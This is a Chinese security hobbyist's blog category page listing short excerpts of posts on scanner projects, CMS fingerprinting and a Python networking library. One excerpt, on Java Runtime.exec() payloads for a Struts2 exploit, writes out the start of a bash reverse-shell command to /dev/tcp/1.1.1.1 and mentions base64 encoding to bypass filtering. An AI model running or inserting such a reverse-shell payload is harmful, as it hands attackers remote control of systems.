各类折腾

折腾各种新奇的想法,并记录笔记

各类折腾

w12scan 想法和front-end

阅读(97)评论(0)

很久之前就有w12scan的想法,但是一直停留在那里,这次借毕业设计的机会,将它实现出来!~ Thinking原本设计出来是为了寻找SRC的资产等信息,后来觉得可以在扩大一下,保留SRC资产的收集功能,将范围扩大到全网。具体我想模仿zoomeye,fofa的全网检索功能,所以会将所有的域名IP信息进行深度的指纹识别入库,保留SRC的功能是指我可以随时指定扫...

各类折腾

Java Runtime.getRuntime().exec() 的那些payloads

阅读(1846)评论(0)

0x01在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

各类折腾

博客升级计划

阅读(2121)评论(2)

改装博客因为一些数据的历史性,加上也不想在折腾其他博客了,本来想自己写个博客的,但那时因为之前自己域名在国外,速度很慢,想做成静态化减小资源压力。但现在博客以及在国内备案,用腾讯云学生主机还是绰绰有余,所以没有自己造轮子的必要了,主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美,加上漏洞部分,所以我决定对博客系统...

各类折腾

CMS在线识别(三)数据统计

阅读(850)评论(0)

在全网扫描时,对CMS指纹进行分析,想法是仅从首页或者一些地方就可以获取到,尽量不使用指纹库中庞大的路径扫描。 同时也统计排名Top使用的cms,数据为airbug项目提供参考。 查询语句: SELECT result,count(id) as total FROM `whatcms_result` group by re...

各类折腾

基于深度学习的CMS识别,在线体验地址

阅读(1037)评论(0)

只训练了dedecms和discuz这两个分类,地址是 http://ai.baidu.com/easydl/h5/15056/ef04c0d2f32f9cddf840b0f4b8f31c7c 测试了一下,准确率差强人意,但效果还是有的 next图像识别准确率还是差强人意,而且还让我认识到一个问题,比如emlog和WordPress两个都是博客系统,...

各类折腾

AirEye 网络空间搜索引擎

阅读(950)评论(0)

看了Biu的演示视频,太棒了,我也要和它做得一样甚至更好 花了一下午的时间用Bootrasp4画出了界面,觉得还不错,后面再用一些小图标修饰一下就更好了

各类折腾

hack-requests,更好用的python网络库

阅读(567)评论(0)

最近在写w12scan的时候,想到所有的网络访问应该由一个专门的模块进行管理,之前只是用的requests,但是连接池有很多限制,而且对底层数据包不好访问,需要hook,这又会带来更多的问题。 于是就有想法来写一款自己用的网络访问库,之前也有考虑过hackhttp,但是hackhttp参数传递用的不是很习惯,而且不兼容python3. 我...

各类折腾

w12scan&AirPoc Hello World 界面初览

阅读(972)评论(0)

原本叫w12scan的,但为了纪念“空气炮”这么好听的名字,所以它的名字是airpoc(空气炮)。 界面写完一个就忍不住就放出来了,这次设想很大,可能要好久才能发布。。真期待完成的样子~ 原本也是想不依赖任何库来写,但是实习时发现docker的应用很广了,一键部署docker非常快,所以模式可以是将客户端封装成docker的形式...